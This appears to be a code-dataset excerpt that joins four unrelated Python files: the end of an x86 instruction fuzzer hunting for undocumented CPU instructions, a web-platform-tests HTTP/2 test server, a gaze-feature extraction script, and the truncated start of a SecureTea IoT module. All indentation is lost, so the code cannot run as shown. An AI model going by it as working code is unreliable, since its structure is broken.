self.ticks = self.ticks + 1
if self.ticks & self.TICK_MASK == 0:
with open(TICK, 'w') as f:
f.write("%s" % hexlify(synth_insn))
time.sleep(self.TIME_SLICE)
def get_cpu_info():
with open("/proc/cpuinfo", "r") as f:
cpu = [l.strip() for l in f.readlines()[:7]]
return cpu
def dump_artifacts(r, injector, command_line):
global arch
tee = Tee(LOG, "w")
tee.write("#\n")
tee.write("# %s\n" % command_line)
tee.write("# %s\n" % injector.command)
tee.write("#\n")
tee.write("# insn tested: %d\n" % r.ic)
tee.write("# artf found: %d\n" % r.ac)
tee.write("# runtime: %s\n" % r.elapsed())
tee.write("# seed: %d\n" % injector.settings.seed)
tee.write("# arch: %s\n" % arch)
tee.write("# date: %s\n" % time.strftime("%Y-%m-%d %H:%M:%S"))
tee.write("#\n")
tee.write("# cpu:\n")
cpu = get_cpu_info()
for l in cpu:
tee.write("# %s\n" % l)
tee.write("# %s v l s c\n" % (" " * 28))
for k in sorted(list(r.ad)):
v = r.ad[k]
tee.write(result_string(k, v))
def cleanup(gui, poll, injector, ts, tests, command_line, args):
ts.run = False
if gui:
gui.stop()
if poll:
poll.stop()
if injector:
injector.stop()
'''
# doesn't work
if gui:
for (i, c) in enumerate(gui.orig_colors):
curses.init_color(i, c[0], c[1], c[2])
'''
curses.nocbreak();
curses.echo()
curses.endwin()
dump_artifacts(tests, injector, command_line)
if args.save:
with open(LAST, "w") as f:
f.write(hexlify(cstr2py(tests.r.raw_insn)))
sys.exit(0)
def main():
global arch
def exit_handler(signal, frame):
cleanup(gui, poll, injector, ts, tests, command_line, args)
injector = None
poll = None
gui = None
command_line = " ".join(sys.argv)
parser = argparse.ArgumentParser()
parser.add_argument("--len", action="store_true", default=False,
help="search for length differences in all instructions (instructions\
that executed differently than the disassembler expected, or did not\
exist when the disassembler expected them to)"
)
parser.add_argument("--dis", action="store_true", default=False,
help="search for length differences in valid instructions (instructions\
that executed differently than the disassembler expected)"
)
parser.add_argument("--unk", action="store_true", default=False,
help="search for unknown instructions (instructions that the\
disassembler doesn't know about but successfully execute)"
)
parser.add_argument("--ill", action="store_true", default=False,
help="the inverse of --unk, search for invalid disassemblies\
(instructions that do not successfully execute but that the\
disassembler acknowledges)"
)
parser.add_argument("--tick", action="store_true", default=False,
help="periodically write the current instruction to disk"
)
parser.add_argument("--save", action="store_true", default=False,
help="save search progress on exit"
)
parser.add_argument("--resume", action="store_true", default=False,
help="resume search from last saved state"
)
parser.add_argument("--sync", action="store_true", default=False,
help="write search results to disk as they are found"
)
parser.add_argument("--low-mem", action="store_true", default=False,
help="do not store results in memory"
)
parser.add_argument("injector_args", nargs=argparse.REMAINDER)
args = parser.parse_args()
injector_args = args.injector_args
if "--" in injector_args: injector_args.remove("--")
if not args.len and not args.unk and not args.dis and not args.ill:
print("warning: no search type (--len, --unk, --dis, --ill) specified, results will not be recorded.")
raw_input()
if args.resume:
if "-i" in injector_args:
print("--resume is incompatible with -i")
sys.exit(1)
if os.path.exists(LAST):
with open(LAST, "r") as f:
insn = f.read()
injector_args.extend(['-i',insn])
else:
print("no resume file found")
sys.exit(1)
if not os.path.exists(OUTPUT):
os.makedirs(OUTPUT)
injector_bitness, errors = \
subprocess.Popen(
['file', INJECTOR],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
).communicate()
arch = re.search(b".*(..)-bit.*", injector_bitness).group(1)
ts = ThreadState()
signal.signal(signal.SIGINT, exit_handler)
settings = Settings(args.injector_args)
tests = Tests()
injector = Injector(settings)
injector.start()
poll = Poll(ts, injector, tests, command_line, args.sync,
args.low_mem, args.unk, args.len, args.dis, args.ill)
poll.start()
gui = Gui(ts, injector, tests, args.tick)
gui.start()
while ts.run:
time.sleep(.1)
cleanup(gui, poll, injector, ts, tests, command_line, args)
if __name__ == '__main__':
main()
|
server.py
|
import errno
import http.server
import os
import socket
from socketserver import ThreadingMixIn
import ssl
import sys
import threading
import time
import traceback
import uuid
from collections import OrderedDict
from queue import Empty, Queue
from h2.config import H2Configuration
from h2.connection import H2Connection
from h2.events import RequestReceived, ConnectionTerminated, DataReceived, StreamReset, StreamEnded
from h2.exceptions import StreamClosedError, ProtocolError
from h2.settings import SettingCodes
from h2.utilities import extract_method_header
from urllib.parse import urlsplit, urlunsplit
from mod_pywebsocket import dispatch
from mod_pywebsocket.handshake import HandshakeException, AbortedByUserException
from . import routes as default_routes
from .config import ConfigBuilder
from .logger import get_logger
from .request import Server, Request, H2Request
from .response import Response, H2Response
from .router import Router
from .utils import HTTPException, isomorphic_decode, isomorphic_encode
from .constants import h2_headers
from .ws_h2_handshake import WsH2Handshaker
# We need to stress test that browsers can send/receive many headers (there is
# no specified limit), but the Python stdlib has an arbitrary limit of 100
# headers. Hitting the limit leads to HTTP 431, so we monkey patch it higher.
# https://bugs.python.org/issue26586
# https://github.com/web-platform-tests/wpt/pull/24451
import http.client
assert isinstance(getattr(http.client, '_MAXHEADERS'), int)
setattr(http.client, '_MAXHEADERS', 512)
"""
HTTP server designed for testing purposes.
The server is designed to provide flexibility in the way that
requests are handled, and to provide control both of exactly
what bytes are put on the wire for the response, and in the
timing of sending those bytes.
The server is based on the stdlib HTTPServer, but with some
notable differences in the way that requests are processed.
Overall processing is handled by a WebTestRequestHandler,
which is a subclass of BaseHTTPRequestHandler. This is responsible
for parsing the incoming request. A RequestRewriter is then
applied and may change the request data if it matches a
supplied rule.
Once the request data had been finalised, Request and Response
objects are constructed. These are used by the other parts of the
system to read information about the request and manipulate the
response.
Each request is handled by a particular handler function. The
mapping between Request and the appropriate handler is determined
by a Router. By default handlers are installed to interpret files
under the document root with .py extensions as executable python
files (see handlers.py for the api for such files), .asis files as
bytestreams to be sent literally and all other files to be served
statically.
The handler functions are responsible for either populating the
fields of the response object, which will then be written when the
handler returns, or for directly writing to the output stream.
"""
class RequestRewriter(object):
def __init__(self, rules):
"""Object for rewriting the request path.
:param rules: Initial rules to add; a list of three item tuples
(method, input_path, output_path), defined as for
register()
"""
self.rules = {}
for rule in reversed(rules):
self.register(*rule)
self.logger = get_logger()
def register(self, methods, input_path, output_path):
"""Register a rewrite rule.
:param methods: Set of methods this should match. "*" is a
special value indicating that all methods should
be matched.
:param input_path: Path to match for the initial request.
:param output_path: Path to replace the input path with in
the request.
"""
if isinstance(methods, (bytes, str)):
methods = [methods]
self.rules[input_path] = (methods, output_path)
def rewrite(self, request_handler):
"""Rewrite the path in a BaseHTTPRequestHandler instance, if
it matches a rule.
:param request_handler: BaseHTTPRequestHandler for which to
rewrite the request.
"""
split_url = urlsplit(request_handler.path)
if split_url.path in self.rules:
methods, destination = self.rules[split_url.path]
if "*" in methods or request_handler.command in methods:
self.logger.debug("Rewriting request path %s to %s" %
(request_handler.path, destination))
new_url = list(split_url)
new_url[2] = destination
new_url = urlunsplit(new_url)
request_handler.path = new_url
class WebTestServer(ThreadingMixIn, http.server.HTTPServer):
allow_reuse_address = True
acceptable_errors = (errno.EPIPE, errno.ECONNABORTED)
request_queue_size = 2000
# Ensure that we don't hang on shutdown waiting for requests
daemon_threads = True
def __init__(self, server_address, request_handler_cls,
router, rewriter, bind_address, ws_doc_root=None,
config=None, use_ssl=False, key_file=None, certificate=None,
encrypt_after_connect=False, latency=None, http2=False, **kwargs):
"""Server for HTTP(s) Requests
:param server_address: tuple of (server_name, port)
:param request_handler_cls: BaseHTTPRequestHandler-like class to use for
handling requests.
:param router: Router instance to use for matching requests to handler
functions
:param rewriter: RequestRewriter-like instance to use for preprocessing
requests before they are routed
:param config: Dictionary holding environment configuration settings for
handlers to read, or None to use the default values.
:param use_ssl: Boolean indicating whether the server should use SSL
:param key_file: Path to key file to use if SSL is enabled.
:param certificate: Path to certificate to use if SSL is enabled.
:param ws_doc_root: Document root for websockets
:param encrypt_after_connect: For each connection, don't start encryption
until a CONNECT message has been received.
This enables the server to act as a
self-proxy.
:param bind_address True to bind the server to both the IP address and
port specified in the server_address parameter.
False to bind the server only to the port in the
server_address parameter, but not to the address.
:param latency: Delay in ms to wait before serving each response, or
callable that returns a delay in ms
"""
self.router = router
self.rewriter = rewriter
self.scheme = "http2" if http2 else "https" if use_ssl else "http"
self.logger = get_logger()
self.latency = latency
if bind_address:
hostname_port = server_address
else:
hostname_port = ("",server_address[1])
http.server.HTTPServer.__init__(self, hostname_port, request_handler_cls, **kwargs)
if config is not None:
Server.config = config
else:
self.logger.debug("Using default configuration")
with ConfigBuilder(self.logger,
browser_host=server_address[0],
ports={"http": [self.server_address[1]]}) as config:
assert config["ssl_config"] is None
Server.config = config
self.ws_doc_root = ws_doc_root
self.key_file = key_file
self.certificate = certificate
self.encrypt_after_connect = use_ssl and encrypt_after_connect
if use_ssl and not encrypt_after_connect:
if http2:
ssl_context = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH)
ssl_context.load_cert_chain(keyfile=self.key_file, certfile=self.certificate)
ssl_context.set_alpn_protocols(['h2'])
self.socket = ssl_context.wrap_socket(self.socket,
server_side=True)
else:
self.socket = ssl.wrap_socket(self.socket,
keyfile=self.key_file,
certfile=self.certificate,
server_side=True)
def handle_error(self, request, client_address):
error = sys.exc_info()[1]
if ((isinstance(error, OSError) and
isinstance(error.args, tuple) and
error.args[0] in self.acceptable_errors) or
(isinstance(error, IOError) and
error.errno in self.acceptable_errors)):
pass # remote hang up before the result is sent
else:
msg = traceback.format_exc()
self.logger.error("%s %s" % (type(error), error))
self.logger.info(msg)
class BaseWebTestRequestHandler(http.server.BaseHTTPRequestHandler):
"""RequestHandler for WebTestHttpd"""
def __init__(self, *args, **kwargs):
self.logger = get_logger()
http.server.BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
def finish_handling_h1(self, request_line_is_valid):
self.server.rewriter.rewrite(self)
request = Request(self)
response = Response(self, request)
if request.method == "CONNECT":
self.handle_connect(response)
return
if not request_line_is_valid:
response.set_error(414)
response.write()
return
self.logger.debug("%s %s" % (request.method, request.request_path))
handler = self.server.router.get_handler(request)
self.finish_handling(request, response, handler)
def finish_handling(self, request, response, handler):
# If the handler we used for the request had a non-default base path
# set update the doc_root of the request to reflect this
if hasattr(handler, "base_path") and handler.base_path:
request.doc_root = handler.base_path
if hasattr(handler, "url_base") and handler.url_base != "/":
request.url_base = handler.url_base
if self.server.latency is not None:
if callable(self.server.latency):
latency = self.server.latency()
else:
latency = self.server.latency
self.logger.warning("Latency enabled. Sleeping %i ms" % latency)
time.sleep(latency / 1000.)
if handler is None:
self.logger.debug("No Handler found!")
response.set_error(404)
else:
try:
handler(request, response)
except HTTPException as e:
if 500 <= e.code < 600:
self.logger.warning("HTTPException in handler: %s" % e)
self.logger.warning(traceback.format_exc())
response.set_error(e.code, str(e))
except Exception as e:
self.respond_with_error(response, e)
self.logger.debug("%i %s %s (%s) %i" % (response.status[0],
request.method,
request.request_path,
request.headers.get('Referer'),
request.raw_input.length))
if not response.writer.content_written:
response.write()
# If a python handler has been used, the old ones won't send a END_STR data frame, so this
# allows for backwards compatibility by accounting for these handlers that don't close streams
if isinstance(response, H2Response) and not response.writer.stream_ended:
response.writer.end_stream()
# If we want to remove this in the future, a solution is needed for
# scripts that produce a non-string iterable of content, since these
# can't set a Content-Length header. A notable example of this kind of
# problem is with the trickle pipe i.e. foo.js?pipe=trickle(d1)
if response.close_connection:
self.close_connection = True
if not self.close_connection:
# Ensure that the whole request has been read from the socket
request.raw_input.read()
def handle_connect(self, response):
self.logger.debug("Got CONNECT")
response.status = 200
response.write()
if self.server.encrypt_after_connect:
self.logger.debug("Enabling SSL for connection")
self.request = ssl.wrap_socket(self.connection,
keyfile=self.server.key_file,
certfile=self.server.certificate,
server_side=True)
self.setup()
return
def respond_with_error(self, response, e):
message = str(e)
if message:
err = [message]
else:
err = []
err.append(traceback.format_exc())
response.set_error(500, "\n".join(err))
class Http2WebTestRequestHandler(BaseWebTestRequestHandler):
protocol_version = "HTTP/2.0"
def handle_one_request(self):
"""
This is the main HTTP/2.0 Handler.
When a browser opens a connection to the server
on the HTTP/2.0 port, the server enters this which will initiate the h2 connection
and keep running throughout the duration of the interaction, and will read/write directly
from the socket.
Because there can be multiple H2 connections active at the same
time, a UUID is created for each so that it is easier to tell them apart in the logs.
"""
config = H2Configuration(client_side=False)
self.conn = H2ConnectionGuard(H2Connection(config=config))
self.close_connection = False
# Generate a UUID to make it easier to distinguish different H2 connection debug messages
self.uid = str(uuid.uuid4())[:8]
self.logger.debug('(%s) Initiating h2 Connection' % self.uid)
with self.conn as connection:
# Bootstrapping WebSockets with HTTP/2 specification requires
# ENABLE_CONNECT_PROTOCOL to be set in order to enable WebSocket
# over HTTP/2
new_settings = dict(connection.local_settings)
new_settings[SettingCodes.ENABLE_CONNECT_PROTOCOL] = 1
connection.local_settings.update(new_settings)
connection.local_settings.acknowledge()
connection.initiate_connection()
data = connection.data_to_send()
window_size = connection.remote_settings.initial_window_size
self.request.sendall(data)
# Dict of { stream_id: (thread, queue) }
stream_queues = {}
try:
while not self.close_connection:
data = self.request.recv(window_size)
if data == '':
self.logger.debug('(%s) Socket Closed' % self.uid)
self.close_connection = True
continue
with self.conn as connection:
frames = connection.receive_data(data)
window_size = connection.remote_settings.initial_window_size
self.logger.debug('(%s) Frames Received: ' % self.uid + str(frames))
for frame in frames:
if isinstance(frame, ConnectionTerminated):
self.logger.debug('(%s) Connection terminated by remote peer ' % self.uid)
self.close_connection = True
# Flood all the streams with connection terminated, this will cause them to stop
for stream_id, (thread, queue) in stream_queues.items():
queue.put(frame)
elif hasattr(frame, 'stream_id'):
if frame.stream_id not in stream_queues:
queue = Queue()
stream_queues[frame.stream_id] = (self.start_stream_thread(frame, queue), queue)
stream_queues[frame.stream_id][1].put(frame)
if isinstance(frame, StreamEnded) or (hasattr(frame, "stream_ended") and frame.stream_ended):
del stream_queues[frame.stream_id]
except OSError as e:
self.logger.error('(%s) Closing Connection - \n%s' % (self.uid, str(e)))
if not self.close_connection:
self.close_connection = True
except Exception as e:
self.logger.error('(%s) Unexpected Error - \n%s' % (self.uid, str(e)))
finally:
for stream_id, (thread, queue) in stream_queues.items():
queue.put(None)
thread.join()
def _is_extended_connect_frame(self, frame):
if not isinstance(frame, RequestReceived):
return False
method = extract_method_header(frame.headers)
if method != b"CONNECT":
return False
protocol = ""
for key, value in frame.headers:
if key in (b':protocol', u':protocol'):
protocol = isomorphic_encode(value)
break
if protocol != b"websocket":
raise ProtocolError("Invalid protocol %s with CONNECT METHOD" % (protocol,))
return True
def start_stream_thread(self, frame, queue):
"""
This starts a new thread to handle frames for a specific stream.
:param frame: The first frame on the stream
:param queue: A queue object that the thread will use to check for new frames
:return: The thread object that has already been started
"""
if self._is_extended_connect_frame(frame):
target = Http2WebTestRequestHandler._stream_ws_thread
else:
target = Http2WebTestRequestHandler._stream_thread
t = threading.Thread(
target=target,
args=(self, frame.stream_id, queue)
)
t.start()
return t
def _stream_ws_thread(self, stream_id, queue):
frame = queue.get(True, None)
if frame is None:
return
rfile, wfile = os.pipe()
rfile, wfile = os.fdopen(rfile, 'rb'), os.fdopen(wfile, 'wb', 0) # needs to be unbuffer for websockets
stream_handler = H2HandlerCopy(self, frame, rfile)
h2request = H2Request(stream_handler)
h2response = H2Response(stream_handler, h2request)
dispatcher = dispatch.Dispatcher(self.server.ws_doc_root, None, False)
if not dispatcher.get_handler_suite(stream_handler.path):
h2response.set_error(404)
h2response.write()
return
request_wrapper = _WebSocketRequest(stream_handler, h2response)
handshaker = WsH2Handshaker(request_wrapper, dispatcher)
try:
handshaker.do_handshake()
except HandshakeException as e:
self.logger.info('Handshake failed for error: %s' % e)
h2response.set_error(e.status)
h2response.write()
return
except AbortedByUserException:
h2response.write()
return
# h2 Handshaker prepares the headers but does not send them down the
# wire. Flush the headers here.
try:
h2response.write_status_headers()
except StreamClosedError:
# work around https://github.com/web-platform-tests/wpt/issues/27786
# The stream was already closed.
return
request_wrapper._dispatcher = dispatcher
# we need two threads:
# - one to handle the frame queue
# - one to handle the request (dispatcher.transfer_data is blocking)
# the alternative is to have only one (blocking) thread. That thread
# will call transfer_data. That would require a special case in
# handle_one_request, to bypass the queue and write data to wfile
# directly.
t = threading.Thread(
target=Http2WebTestRequestHandler._stream_ws_sub_thread,
args=(self, request_wrapper, stream_handler, queue)
)
t.start()
while not self.close_connection:
try:
frame = queue.get(True, 1)
except Empty:
continue
if isinstance(frame, DataReceived):
wfile.write(frame.data)
if frame.stream_ended:
raise NotImplementedError("frame.stream_ended")
wfile.close()
elif frame is None or isinstance(frame, (StreamReset, StreamEnded, ConnectionTerminated)):
self.logger.debug('(%s - %s) Stream Reset, Thread Closing' % (self.uid, stream_id))
break
t.join()
def _stream_ws_sub_thread(self, request, stream_handler, queue):
dispatcher = request._dispatcher
try:
dispatcher.transfer_data(request)
except StreamClosedError:
# work around https://github.com/web-platform-tests/wpt/issues/27786
# The stream was already closed.
queue.put(None)
return
stream_id = stream_handler.h2_stream_id
with stream_handler.conn as connection:
try:
connection.end_stream(stream_id)
data = connection.data_to_send()
stream_handler.request.sendall(data)
except StreamClosedError: # maybe the stream has already been closed
pass
queue.put(None)
def _stream_thread(self, stream_id, queue):
"""
This thread processes frames for a specific stream. It waits for frames to be placed
in the queue, and processes them. When it receives a request frame, it will start processing
immediately, even if there are data frames to follow. One of the reasons for this is that it
can detect invalid requests before needing to read the rest of the frames.
"""
# The file-like pipe object that will be used to share data to request object if data is received
wfile = None
request = None
response = None
req_handler = None
while not self.close_connection:
try:
frame = queue.get(True, 1)
except Empty:
# Restart to check for close_connection
continue
self.logger.debug('(%s - %s) %s' % (self.uid, stream_id, str(frame)))
if isinstance(frame, RequestReceived):
rfile, wfile = os.pipe()
rfile, wfile = os.fdopen(rfile, 'rb'), os.fdopen(wfile, 'wb')
stream_handler = H2HandlerCopy(self, frame, rfile)
stream_handler.server.rewriter.rewrite(stream_handler)
request = H2Request(stream_handler)
response = H2Response(stream_handler, request)
req_handler = stream_handler.server.router.get_handler(request)
if hasattr(req_handler, "frame_handler"):
# Convert this to a handler that will utilise H2 specific functionality, such as handling individual frames
req_handler = self.frame_handler(request, response, req_handler)
if hasattr(req_handler, 'handle_headers'):
req_handler.handle_headers(frame, request, response)
elif isinstance(frame, DataReceived):
wfile.write(frame.data)
if hasattr(req_handler, 'handle_data'):
req_handler.handle_data(frame, request, response)
if frame.stream_ended:
wfile.close()
elif frame is None or isinstance(frame, (StreamReset, StreamEnded, ConnectionTerminated)):
self.logger.debug('(%s - %s) Stream Reset, Thread Closing' % (self.uid, stream_id))
break
if request is not None:
request.frames.append(frame)
if hasattr(frame, "stream_ended") and frame.stream_ended:
try:
self.finish_handling(request, response, req_handler)
except StreamClosedError:
self.logger.debug('(%s - %s) Unable to write response; stream closed' %
(self.uid, stream_id))
break
def frame_handler(self, request, response, handler):
try:
return handler.frame_handler(request)
except HTTPException as e:
response.set_error(e.code, str(e))
response.write()
except Exception as e:
self.respond_with_error(response, e)
response.write()
class H2ConnectionGuard(object):
"""H2Connection objects are not threadsafe, so this keeps thread safety"""
lock = threading.Lock()
def __init__(self, obj):
assert isinstance(obj, H2Connection)
self.obj = obj
def __enter__(self):
self.lock.acquire()
return self.obj
def __exit__(self, exception_type, exception_value, traceback):
self.lock.release()
class H2Headers(dict):
def __init__(self, headers):
self.raw_headers = OrderedDict()
for key, val in headers:
key = isomorphic_decode(key)
val = isomorphic_decode(val)
self.raw_headers[key] = val
dict.__setitem__(self, self._convert_h2_header_to_h1(key), val)
def _convert_h2_header_to_h1(self, header_key):
if header_key[1:] in h2_headers and header_key[0] == ':':
return header_key[1:]
else:
return header_key
# TODO This does not seem relevant for H2 headers, so using a dummy function for now
def getallmatchingheaders(self, header):
return ['dummy function']
class H2HandlerCopy(object):
def __init__(self, handler, req_frame, rfile):
self.headers = H2Headers(req_frame.headers)
self.command = self.headers['method']
self.path = self.headers['path']
self.h2_stream_id = req_frame.stream_id
self.server = handler.server
self.protocol_version = handler.protocol_version
self.client_address = handler.client_address
self.raw_requestline = ''
self.rfile = rfile
self.request = handler.request
self.conn = handler.conn
class Http1WebTestRequestHandler(BaseWebTestRequestHandler):
protocol_version = "HTTP/1.1"
def handle_one_request(self):
response = None
try:
self.close_connection = False
request_line_is_valid = self.get_request_line()
if self.close_connection:
return
request_is_valid = self.parse_request()
if not request_is_valid:
#parse_request() actually sends its own error responses
return
self.finish_handling_h1(request_line_is_valid)
except socket.timeout as e:
self.log_error("Request timed out: %r", e)
self.close_connection = True
return
except Exception:
err = traceback.format_exc()
if response:
response.set_error(500, err)
response.write()
def get_request_line(self):
try:
self.raw_requestline = self.rfile.readline(65537)
except OSError:
self.close_connection = True
return False
if len(self.raw_requestline) > 65536:
self.requestline = ''
self.request_version = ''
self.command = ''
return False
if not self.raw_requestline:
self.close_connection = True
return True
class WebTestHttpd(object):
"""
:param host: Host from which to serve (default: 127.0.0.1)
:param port: Port from which to serve (default: 8000)
:param server_cls: Class to use for the server (default depends on ssl vs non-ssl)
:param handler_cls: Class to use for the RequestHandler
:param use_ssl: Use a SSL server if no explicit server_cls is supplied
:param key_file: Path to key file to use if ssl is enabled
:param certificate: Path to certificate file to use if ssl is enabled
:param encrypt_after_connect: For each connection, don't start encryption
until a CONNECT message has been received.
This enables the server to act as a
self-proxy.
:param router_cls: Router class to use when matching URLs to handlers
:param doc_root: Document root for serving files
:param ws_doc_root: Document root for websockets
:param routes: List of routes with which to initialize the router
:param rewriter_cls: Class to use for request rewriter
:param rewrites: List of rewrites with which to initialize the rewriter_cls
:param config: Dictionary holding environment configuration settings for
handlers to read, or None to use the default values.
:param bind_address: Boolean indicating whether to bind server to IP address.
:param latency: Delay in ms to wait before serving each response, or
callable that returns a delay in ms
HTTP server designed for testing scenarios.
Takes a router class which provides one method get_handler which takes a Request
and returns a handler function.
.. attribute:: host
The host name or ip address of the server
.. attribute:: port
The port on which the server is running
.. attribute:: router
The Router object used to associate requests with resources for this server
.. attribute:: rewriter
The Rewriter object used for URL rewriting
.. attribute:: use_ssl
Boolean indicating whether the server is using ssl
.. attribute:: started
Boolean indicating whether the server is running
"""
def __init__(self, host="127.0.0.1", port=8000,
server_cls=None, handler_cls=Http1WebTestRequestHandler,
use_ssl=False, key_file=None, certificate=None, encrypt_after_connect=False,
router_cls=Router, doc_root=os.curdir, ws_doc_root=None, routes=None,
rewriter_cls=RequestRewriter, bind_address=True, rewrites=None,
latency=None, config=None, http2=False):
if routes is None:
routes = default_routes.routes
self.host = host
self.router = router_cls(doc_root, routes)
self.rewriter = rewriter_cls(rewrites if rewrites is not None else [])
self.use_ssl = use_ssl
self.http2 = http2
self.logger = get_logger()
if server_cls is None:
server_cls = WebTestServer
if use_ssl:
if not os.path.exists(key_file):
raise ValueError("SSL certificate not found: {}".format(key_file))
if not os.path.exists(certificate):
raise ValueError("SSL key not found: {}".format(certificate))
try:
self.httpd = server_cls((host, port),
handler_cls,
self.router,
self.rewriter,
config=config,
bind_address=bind_address,
ws_doc_root=ws_doc_root,
use_ssl=use_ssl,
key_file=key_file,
certificate=certificate,
encrypt_after_connect=encrypt_after_connect,
latency=latency,
http2=http2)
self.started = False
_host, self.port = self.httpd.socket.getsockname()
except Exception:
self.logger.critical("Failed to start HTTP server on port %s; "
"is something already using that port?" % port)
raise
def start(self):
"""Start the server.
:param block: True to run the server on the current thread, blocking,
False to run on a separate thread."""
http_type = "http2" if self.http2 else "https" if self.use_ssl else "http"
self.logger.info("Starting %s server on %s:%s" % (http_type, self.host, self.port))
self.started = True
self.server_thread = threading.Thread(target=self.httpd.serve_forever)
self.server_thread.setDaemon(True) # don't hang on exit
self.server_thread.start()
def stop(self):
"""
Stops the server.
If the server is not running, this method has no effect.
"""
if self.started:
try:
self.httpd.shutdown()
self.httpd.server_close()
self.server_thread.join()
self.server_thread = None
self.logger.info("Stopped http server on %s:%s" % (self.host, self.port))
except AttributeError:
pass
self.started = False
self.httpd = None
def get_url(self, path="/", query=None, fragment=None):
if not self.started:
return None
return urlunsplit(("http" if not self.use_ssl else "https",
"%s:%s" % (self.host, self.port),
path, query, fragment))
class _WebSocketConnection(object):
def __init__(self, request_handler, response):
"""Mimic mod_python mp_conn.
:param request_handler: A H2HandlerCopy instance.
:param response: A H2Response instance.
"""
self._request_handler = request_handler
self._response = response
self.remote_addr = self._request_handler.client_address
def write(self, data):
self._response.writer.write_data(data, False)
def read(self, length):
return self._request_handler.rfile.read(length)
class _WebSocketRequest(object):
def __init__(self, request_handler, response):
"""Mimic mod_python request.
:param request_handler: A H2HandlerCopy instance.
:param response: A H2Response instance.
"""
self.connection = _WebSocketConnection(request_handler, response)
self.protocol = "HTTP/2"
self._response = response
self.uri = request_handler.path
self.unparsed_uri = request_handler.path
self.method = request_handler.command
# read headers from request_handler
self.headers_in = request_handler.headers
# write headers directly into H2Response
self.headers_out = response.headers
# proxies status to H2Response
@property
def status(self):
return self._response.status
@status.setter
def status(self, status):
self._response.status = status
|
00_compute_features.py
|
import numpy as np
import os
from config import conf
from featureExtraction import gaze_analysis as ga
import threading
import getopt
import sys
from config import names as gs
def compute_sliding_window_features(participant, ws, gazeAnalysis_instance):
"""
calls the gazeAnalysis instance it was given, calls it to get features and saves those to file
"""
window_features, window_times = gazeAnalysis_instance.get_window_features(ws, conf.get_step_size(ws))
np.save(conf.get_window_features_file(participant, ws), window_features)
np.save(conf.get_window_times_file(participant, ws), window_times)
if __name__ == "__main__":
for p in xrange(0,conf.n_participants):
threads = [] # one thread per time window will be used and collected in this list
# create data folder, plus one subfolder for participant p
if not os.path.exists(conf.get_feature_folder(p)):
os.makedirs(conf.get_feature_folder(p))
# make sure all relevant raw data files exist in the right folder
gaze_file = conf.get_data_folder(p) + '/gaze_positions.csv'
pupil_diameter_file = conf.get_data_folder(p) + '/pupil_diameter.csv'
events_file = conf.get_data_folder(p) + '/events.csv'
assert os.path.exists(gaze_file) and os.path.exists(pupil_diameter_file) and os.path.exists(events_file)
# load relevant data
gaze = np.genfromtxt(gaze_file, delimiter=',', skip_header=1)
pupil_diameter = np.genfromtxt(pupil_diameter_file, delimiter=',', skip_header=1)
events = np.genfromtxt(events_file, delimiter=',', skip_header=1, dtype=str)
# create instance of gazeAnalysis class that will be used for feature extraction
# this already does some initial computation that will be useful for all window sizes:
extractor = ga.gazeAnalysis(gaze, conf.fixation_radius_threshold, conf.fixation_duration_threshold,
conf.saccade_min_velocity, conf.max_saccade_duration,
pupil_diameter=pupil_diameter, event_strings=events)
# compute sliding window features by creating one thread per window size
for window_size in conf.all_window_sizes:
if not os.path.exists(conf.get_window_features_file(p, window_size)):
thread = threading.Thread(target=compute_sliding_window_features, args=(p, window_size, extractor))
thread.start()
threads.append(thread)
for t in threads:
t.join()
print 'finished all features for participant', p
# Merge the features from all participants into three files per window_size:
# merged_features includes all features
# merged_traits contains the ground truth personality score ranges
# merged_ids contains the participant number and context (way, shop, half of the recording)
# load ground truth from info folder:
binned_personality = np.genfromtxt(conf.binned_personality_file, delimiter=',', skip_header=1)
trait_labels = np.loadtxt(conf.binned_personality_file, delimiter=',', dtype=str)[0,:]
annotation = np.genfromtxt(conf.annotation_path, delimiter=',', skip_header=1)
for window_size in conf.all_window_sizes:
print 'merging window size', window_size
windowfeats_subtask_all = []
windowfeats_subtask_ids = []
windowfeats_subtask_all_y = []
for p in xrange(0, conf.n_participants):
featfilename = conf.get_window_features_file(p, window_size)
timesfilename = conf.get_window_times_file(p, window_size)
if os.path.exists(featfilename) and os.path.exists(timesfilename):
data = np.load(featfilename).tolist()
windowfeats_subtask_all.extend(data)
windowfeats_subtask_all_y.extend([binned_personality[p, 1:]] * len(data))
times = np.load(timesfilename)[:, 2:]
ann = annotation[p,1:]
ids_annotation = np.zeros((len(data), 3), dtype=int) # person, way/shop, half
ids_annotation[:,0] = p
ids_annotation[(times[:,1] < ann[0]),1] = conf.time_window_annotation_wayI
ids_annotation[(times[:,0] > ann[0]) & (times[:,1] < ann[1]),1] = conf.time_window_annotation_shop
ids_annotation[(times[:,0] > ann[1]),1] = conf.time_window_annotation_wayII
ids_annotation[:(len(data)/2), 2] = conf.time_window_annotation_halfI
ids_annotation[(len(data)/2):, 2] = conf.time_window_annotation_halfII
windowfeats_subtask_ids.extend(ids_annotation.tolist())
else:
print 'did not find ', featfilename
sys.exit(1)
ids = np.array(windowfeats_subtask_ids)
x = np.array(windowfeats_subtask_all, dtype=float)
y = np.array(windowfeats_subtask_all_y)
f1, f2, f3 = conf.get_merged_feature_files(window_size)
np.savetxt(f1, x, delimiter=',', header=','.join(gs.full_long_label_list), comments='')
np.savetxt(f2, y, delimiter=',', header=','.join(trait_labels), comments='')
np.savetxt(f3, ids, delimiter=',', header='Participant ID', comments='')
|
iot_mode.py
|
# -*- coding: utf-8 -*-
u"""IoT Mode for SecureTea.
Project:
╔═╗┌─┐┌─┐┬ ┬┬─┐┌─┐╔╦╗┌─┐┌─┐
╚═╗├┤ │ │ │├┬┘├┤ ║ ├┤ ├─┤
╚═╝└─┘└─┘└─┘┴└─└─┘ ╩ └─┘┴ ┴
Author: Abhishek Sharma <abhishek_official@hotmail.com> , Jul 31 2019
Version: 1.5.1
Module: SecureTea
"""
# Import all the modules necessary for IoT mode
from securetea.lib.ids import secureTeaIDS
from securetea.lib.firewall import secureTeaFirewall
from securetea.lib.iot import iot_checker
from securetea import logger
import multiprocessing
import sys
class IoTMode(object):
"""IoTMode class."""
def __init__(self, debug=False, cred=None):
"""
Initialize IoTMode.
Args:
debug (bool): Log on terminal or not
cred (dict): Configuration credentials
Raises:
None
Returns
None
"""
self.debug = debug
# Initialize logger
self.logger = logger.SecureTeaLogger(
__name__,
debug=self.debug
)
# Initialize credentials
if cred is not None:
self.cred = cred
else:
self.logger.log(
"No configuraton parameters found, exiting",
logtype="error"
)
